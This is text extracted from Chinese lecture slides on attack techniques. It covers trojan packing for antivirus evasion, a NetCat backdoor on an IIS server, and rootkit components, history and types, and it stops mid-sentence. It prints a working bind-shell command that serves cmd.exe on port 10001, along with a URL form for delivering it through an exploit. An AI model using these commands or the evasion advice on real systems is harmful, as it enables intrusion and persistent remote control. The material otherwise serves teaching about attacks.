客技术1.pptVIP

加壳的全称应该是可执行程序资源压缩，是保护文件的常用手段。加壳其实是利用特殊的算法，对EXE、DLL文件里的资源进行压缩，类似WINZIP的效果。加壳的程序可以直接运行，但是不能查看源代码。要经过脱壳才可以查看源代码。加了壳的程序通过Windows加载器载入内存后，先于源程序执行，得到控制权，执行过程中对原始程序进行还原，还原完成后再把控制权交给原始程序，执行原始代码的部分，这也就是所谓的脱壳。脱壳过程完全隐蔽，都在内存中完成。(段纲，2008) 木马文件加壳是黑客使用的老手段了，木马加壳的目的主要有两个:一是实现免 杀，二是减小体积。 因为加了壳的文件可以防止程序被人跟踪调试，防止算法程序被静态分析。但是如果特征码的查杀是内存中的查杀，那么木马文件就很难逃脱查杀了。 * * 旧的协议栈使用.0作为网络广播地址，而新的协议栈使用.255作为广播地址。 NetCat应用实例 针对IIS 的植入后门案例 首先将NetCat上载至一个IIS Server nc –L –p 10001 –e cmd.exe -L 告诉netcat不要中断联机而是等待联机 -p 我们所要listen特定的port -e 当联机后我们要执行的程序 将其转换成Unicode URL的command http://Exploit URL/c+nc+-L+-p+10001+-e+cmd.exe NetCat应用实例 在入侵的服务器上执行NetCat，启动NetCat在IIS上监听的端口(10001),执行cmd.exe程序 Rootkit Rootkit一词最早出现在Unix系统上。黑客为了取得系统管理员级的root权限，或者为了清除被系统记录的入侵痕迹，会重新编译一些软件程序（术语称为kit），例如ps、netstat、w、passwd等.这些软件即称作Rootkit,也被视为一项黑客技术。 Rootkit的组件 针对Unix和Linux的rootkit最多，rootkit是由几个独立的程序组成的，一个典型rootkit包括： 以太网嗅探器程序(network sniffer)，用于获得网络上传输的用户名和密码等信息。 木马程序(trojan)，例如：inetd或者login，为攻击者提供后门。 隐藏攻击者的目录和进程的程序，例如：ps、netstat、rshd和ls等。 日志清理工具(log cleaner)，如：zap、zap2或者z2，清除wtmp、utmp和lastlog等日志文件 。 提供telnet、shell和finger等后门服务。 清理/var/log和/var/adm目录中其它文件的一些脚本。 监视网络流量和击键记录。 History of Rootkits 1989: Phrack 25 article by Black Tie Affair on wtmp wiping 1994: CERT advisory CA-1994-01 about SunOS rootkits 1996: Linux Rootkits (lrk3 released) 1997: Phrack 51 article by halflife on LKM-based rootkits 1998: Silvio Cesare’s kernel patching via kmem paper 1999: Greg Hoglund’s NT kernel rootkit paper Attack goals Network sniffer Including password grabber utility Password cracker Vulnerability scanners Autorooter Automatically applies exploits to host ranges DDOS tools Rootkit Types Binary Rootkits Replace user programs like ls, netstat, and ps to hide malicious activity Add backdoors to programs like login and sshd Library Rootkits Replace core system libraries (glibc) to intercept common system calls to hide activities and add backdoors Kernel Rootkits Modify system calls/structures that all user-mode programs rely on to lis